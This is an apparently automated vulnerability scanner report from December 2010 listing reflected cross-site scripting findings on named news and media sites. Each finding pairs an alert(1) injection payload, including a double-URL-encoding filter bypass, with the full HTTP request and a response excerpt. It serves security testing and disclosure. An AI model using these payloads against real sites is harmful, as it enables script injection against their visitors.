<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/wp-6steps/?ac091"><a>818754f36d7=1" id="campaign-form"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1055%253cscript%253ealert%25281%2529%253c%252fscript%253ee5e225c0fd4 was submitted in the REST URL parameter 1. This input was echoed as f1055<script>alert(1)</script>e5e225c0fd4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /columnsf1055%253cscript%253ealert%25281%2529%253c%252fscript%253ee5e225c0fd4/article.asp HTTP/1.1
Host: mcpmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 11 Dec 2010 02:17:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fivbhwifiarrp545p3zkrh55; path=/; HttpOnly
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 57514
Set-Cookie: BIGipServerPool-mcp-80=167971082.20480.0000; path=/
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6a1a0%253cscript%253ealert%25281%2529%253c%252fscript%253e8c5887176a1 was submitted in the REST URL parameter 2. This input was echoed as 6a1a0<script>alert(1)</script>8c5887176a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /columns/article.asp6a1a0%253cscript%253ealert%25281%2529%253c%252fscript%253e8c5887176a1 HTTP/1.1
Host: mcpmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 11 Dec 2010 02:17:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jrpctu3codxumcyau5h1zx55; path=/; HttpOnly
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 57514
Set-Cookie: BIGipServerPool-mcp-80=167971082.20480.0000; path=/
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <span id="ctl00_ContentPlaceHolder_ctl01_lblError" class="error">http://mcpmag.com/columns/article.asp6a1a0<script>alert(1)</script>8c5887176a1 not found</span> ...[SNIP]...
1.25. http://mcpmag.com/columns/article.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mcpmag.com
Path: /columns/article.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 80198<script>alert(1)</script>97468173ffd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /columns/article.asp?80198<script>alert(1)</script>97468173ffd=1 HTTP/1.1
Host: mcpmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 11 Dec 2010 02:17:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5scz2z5502y0svmd1j31xpiu; path=/; HttpOnly
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 57516
Set-Cookie: BIGipServerPool-mcp-80=167971082.20480.0000; path=/
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <span id="ctl00_ContentPlaceHolder_ctl01_lblError" class="error">http://mcpmag.com/columns/article.asp?80198<script>alert(1)</script>97468173ffd=1 not found</span> ...[SNIP]...
1.26. http://podcast.ft.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://podcast.ft.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb08b"><script>alert(1)</script>52d144f10a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php/cb08b"><script>alert(1)</script>52d144f10a4 HTTP/1.1
Host: podcast.ft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:19:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2lq2ektrfuamk9cqu4r3gpuoi1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89975
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Podcast and audio downl ...[SNIP]... <a href='javascript:void(0)' title='Link to audio' onclick="showLink('podcast.ft.com/index.php/cb08b"><script>alert(1)</script>52d144f10a4','1008','share_1008');"> ...[SNIP]...
1.27. http://podcast.ft.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://podcast.ft.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5257b'><script>alert(1)</script>12d6378f5ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php/5257b'><script>alert(1)</script>12d6378f5ff HTTP/1.1
Host: podcast.ft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:19:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2du57i69fa2me9h6bghal34323; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89975
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Podcast and audio downl ...[SNIP]... <a href='/index.php/5257b'><script>alert(1)</script>12d6378f5ff?sid=47' border='0' title="FT Arts podcast"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5165a"-alert(1)-"ee6c016d114 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /20075165a"-alert(1)-"ee6c016d114/0806/p13s01-wmgn.html HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Sat, 11 Dec 2010 02:18:34 GMT
Served-by:
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 02:18:34 GMT
Date: Sat, 11 Dec 2010 02:18:34 GMT
Content-Length: 17196
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--seo title-->
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d5c5"-alert(1)-"af03f3362d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2007/08063d5c5"-alert(1)-"af03f3362d0/p13s01-wmgn.html HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Sat, 11 Dec 2010 02:18:38 GMT
Served-by:
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 02:18:39 GMT
Date: Sat, 11 Dec 2010 02:18:39 GMT
Content-Length: 17196
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--seo title-->
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7886"-alert(1)-"fab3f1bc409 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2007/0806/p13s01-wmgn.htmlb7886"-alert(1)-"fab3f1bc409 HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Sat, 11 Dec 2010 02:18:44 GMT
Served-by:
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 02:18:44 GMT
Date: Sat, 11 Dec 2010 02:18:44 GMT
Content-Length: 17196
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--seo title-->
var s_code=s.t();if(s_code)document.write(s_code); </script> ...[SNIP]...
1.31. http://www.csmonitor.com/2007/0806/p13s01-wmgn.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.csmonitor.com
Path: /2007/0806/p13s01-wmgn.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26e89"-alert(1)-"d9746f262e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2007/0806/p13s01-wmgn.html?26e89"-alert(1)-"d9746f262e0=1 HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Length: 51204
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Content-Language: en-US
Served-by:
Pragma: no-cache
Cache-Control: max-age=86382
Expires: Sun, 12 Dec 2010 02:18:12 GMT
Date: Sat, 11 Dec 2010 02:18:30 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--seo title-->
var s_code=s.t();if(s_code)document.write(s_code); </script> ...[SNIP]...
1.32. http://www.e-health-insider.com/news/2967/most_internet_pharmacies_unregulated [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.e-health-insider.com
Path: /news/2967/most_internet_pharmacies_unregulated
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6ec6"><script>alert(1)</script>90c46f75143 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/2967/most_internet_pharmacies_unregulated?c6ec6"><script>alert(1)</script>90c46f75143=1 HTTP/1.1
Host: www.e-health-insider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 02:17:15 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=13140244;expires=Mon, 03-Dec-2040 02:17:15 GMT;path=/
Set-Cookie: CFTOKEN=40869724;expires=Mon, 03-Dec-2040 02:17:15 GMT;path=/
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <a href="/login.cfm?r=/404.cfm?404;http://www.e-health-insider.com:80/news/2967/most_internet_pharmacies_unregulated?c6ec6"><script>alert(1)</script>90c46f75143=1"> ...[SNIP]...
1.33. http://www.ecommerce-journal.com/news/24293_phishing-does-not-fade-financial-brands-most-exploited-junk-mails [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 514c9"><script>alert(1)</script>9e9311ab829 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/24293_phishing-does-not-fade-financial-brands-most-exploited-junk-mails?514c9"><script>alert(1)</script>9e9311ab829=1 HTTP/1.1
Host: www.ecommerce-journal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><head> <title>Phishing does not fade, with financial brands as most exploited in junk mails | Ecommerce Journa ...[SNIP]... <a style="color: #ffffff;text-decoration: underline;" href="http://m.ecommerce-journal.com/news/24293_phishing-does-not-fade-financial-brands-most-exploited-junk-mails?514c9"><script>alert(1)</script>9e9311ab829=1"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e70ce"><script>alert(1)</script>e2046199a2 was submitted in the REST URL parameter 3. This input was echoed as e70ce\"><script>alert(1)</script>e2046199a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/domaner/villkore70ce"><script>alert(1)</script>e2046199a2 HTTP/1.1
Host: www.iis.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:35 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.iis.se
X-Pingback: http://www.iis.se/wordpress/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:15:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv" lang="sv"> <head>
1.35. http://www.iis.se/en/domaner/villkor [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.iis.se
Path: /en/domaner/villkor
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a9cd"><script>alert(1)</script>ca25a72b85c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a9cd\"><script>alert(1)</script>ca25a72b85c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/domaner/villkor?3a9cd"><script>alert(1)</script>ca25a72b85c=1 HTTP/1.1
Host: www.iis.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:15:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.iis.se
X-Pingback: http://www.iis.se/wordpress/xmlrpc.php
Cache-Control: max-age=900
Expires: Sat, 11 Dec 2010 02:30:30 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv" lang="sv"> <head>
1.36. http://www.independent.co.uk/life-style/fashion/features/boomtime-for-fashion-fakers-1700875.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 242c0"><script>alert(1)</script>9ed7ac74b10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /life-style/fashion/features/boomtime-for-fashion-fakers-1700875.html?242c0"><script>alert(1)</script>9ed7ac74b10=1 HTTP/1.1
Host: www.independent.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:15:36 GMT
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=300D0E5F1D8C04FD04045EF8B769E9F6; Path=/independentLondon
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 115193
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8acb3'-alert(1)-'e3539ed0cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news8acb3'-alert(1)-'e3539ed0cd7/internet/policy/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:25 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:25 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=5SE0P13N3VALJQE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32779
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Policy_Welcome_Ad_1x1;key=/news8acb3'-alert(1)-'e3539ed0cd7/internet/policy/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=646040761;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70e74"><script>alert(1)</script>47b0c19c156 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news70e74"><script>alert(1)</script>47b0c19c156/internet/policy/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:23 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:23 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=BWXLDIFVKVJJFQE1GHPCKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32829
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Policy_Welcome_Ad_1x1;key=/news70e74"><script>alert(1)</script>47b0c19c156/internet/p;kvarticleid=;kvauthor=;loc=300;grp=146444314" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4680b"><script>alert(1)</script>c0059b9b4ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet4680b"><script>alert(1)</script>c0059b9b4ab/policy/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:26 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:26 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=CXNOW3L2131FVQE1GHPCKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32182
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/internet4680b"><script>alert(1)</script>c0059b9b4ab/p;kvarticleid=;kvauthor=;loc=300;grp=69909228" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23f98'-alert(1)-'fad295cde08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet23f98'-alert(1)-'fad295cde08/policy/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:27 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:27 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=2KKREGN1FRSFFQE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32144
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/internet23f98'-alert(1)-'fad295cde08/policy/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=162583866;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e9ab'-alert(1)-'228dc317a35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/policy7e9ab'-alert(1)-'228dc317a35/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:36 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:36 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=IJHIXFHBIOYVXQE1GHPCKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32755
